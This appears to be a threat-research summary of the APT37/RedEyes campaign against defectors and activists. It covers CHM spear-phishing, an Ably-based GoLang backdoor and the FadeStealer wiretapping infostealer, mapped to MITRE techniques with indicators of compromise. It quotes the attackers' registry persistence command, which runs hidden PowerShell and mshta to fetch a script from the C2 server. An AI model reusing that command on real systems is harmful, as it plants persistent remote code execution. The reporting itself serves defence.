Threat Research

RedEyes Group Wiretapping Individuals (APT37) – ASEC BLOG

Securonix

RedEyes (APT37/ScarCruft/Reaper) targeted individuals such as defectors and activists, using a CHM-based initial access chain and a GoLang backdoor that leverages the Ably real-time messaging platform for command-and-control, along with a wiretapping-infostealer called FadeStealer. The operation covered the full kill chain from spearphishing to privilege escalation, C2, and exfiltration, highlighting a modular, cloud-assisted approach to information theft. #RedEyes #APT37 #ScarCruft #FadeStealer #AblyGo #GoLang #GitHub #Wiretapping

Keypoints

  • RedEyes targets specific individuals (defectors, activists, professors) and monitors their activities.
  • May 2023 discovery of an Infostealer with wiretapping features and a GoLang backdoor using Ably for C2.
  • Initial access via CHM files embedded in spear-phishing emails, masquerading as password-protected documents.
  • PowerShell-based backdoor persistence, using an autorun registry key and MSHTA execution.
  • AblyGo backdoor uses Ably cloud channels for command transmission (UP/DOWN messages) with a GitHub-stored authentication key.
  • Exfiltration is staged with FadeStealer, which compresses data via an integrated RAR tool and stores data in %temp% folders before sending.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Initial access via CHM file disguised as a password file in spear-phishing emails. Quote: “The threat actor used a CHM (Compiled HTML Help File) file to carry out their initial breach. Similar to the case covered back in March, ‘Malware Distributed Disguised as a Password File’ [2], it is assumed that targets were approached via spear phishing emails with a normal password-protected document and a CHM malware disguised as a password file attached to them.”
  • [T1218.005] Signed Binary Proxy Execution: Mshta – CHM content triggers MSHTA.exe to execute a malicious script from C&C. Quote: “the internal script code in the CHM shown in Figure 4 triggers MSHTA.exe to be executed, which causes a malicious script from the threat actor’s C&C server to be executed as well.”
  • [T1059.001] PowerShell – Malicious script is PowerShell malware with persistence. Quote: “The malicious script obtained during the analysis was confirmed as PowerShell malware that maintains persistence through the use of an autorun registry key.”
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence via autorun registry key. Quote: “New-ItemProperty -Path HKCU:SoftwareMicrosoftWindowsCurrentVersionRun -Name kcJuWlrQO -Value ‘c:windowssystem32cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 569782 2.2.2.2 || mshta hxxp://172.93.181[.]249/control/html/1.html’ -PropertyType String -Force;”
  • [T1071.001] Web Protocols – C2 over Ably platform (GoLang) with channel authentication key. Quote: “The threat actor carried out later attack stages such as privilege escalation, exfiltration, and malware distribution through a backdoor that utilizes the Ably platform service which is based on GoLang.”
  • [T1560.001] Archive Collected Data – Exfiltration uses a built-in RAR compression utility with password, archiving data at intervals. Quote: “compress the exfiltrated data from the infected PC at 30-minute intervals using a password.”
  • [T1113] Screen Capture – Infostealer features include taking screenshots. Quote: “The executed Infostealer has various features, such as taking screenshots, exfiltrating data …”
  • [T1056.001] Keyboard Input Capture – Keylogging as part of exfiltration features. Quote: “screenshots, exfiltrating data … keylogging, and wiretapping.”
  • [T1123] Audio Capture – Wiretapping via microphone access. Quote: “wiretapping” (microphone wiretapping) in exfiltration features.
  • [T1025] Data from Removable Media – Exfiltrated data includes removable media. Quote: “Removable media device” in exfiltration table.
  • [T1105] Ingress Tool Transfer – GoLang backdoor fetching and decoding of Ably authentication key from GitHub. Quote: “The GoLang backdoor accesses the GitHub URL that exists within its binary and retrieves the data that is in the ‘BASE64-encoded channel authentication key’ format…”

Indicators of Compromise

  • [IP] – 172.93.181.249 – Ably/C2 server endpoint used for command transmission and data exfiltration.
  • [MD5] – 1352abf9de97a0faf8645547211c3be7, 1c1136c12d0535f4b90e32aa36070682
  • [File] – msedgeupdate.ini (3277e0232ed6715f2bae526686232e06), msedgeupdate.ini (3c475d80f5f6272234da821cc418a6f7)
  • [File] – mfc42u.dll (59804449f5670b4b9b3b13efdb296abb)
  • [File] – DESKTOP.lNl (f44bf949abead4af0966436168610bcc)
  • [URL] – hxxp://172.93.181[.]249/control/data/, hxxp://172.93.181[.]249/file/, hxxp://172.93.181[.]249/control/html/1.html
  • [Malware Family/Detection] – Trojan/Win.Goably.C5436296, Trojan/Win.Goably.C5422375, Trojan/Win.Loader.C5424444
  • [CHM] – CHM-based initial access (Compiled HTML Help File)

Read more: https://asec.ahnlab.com/en/54349/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint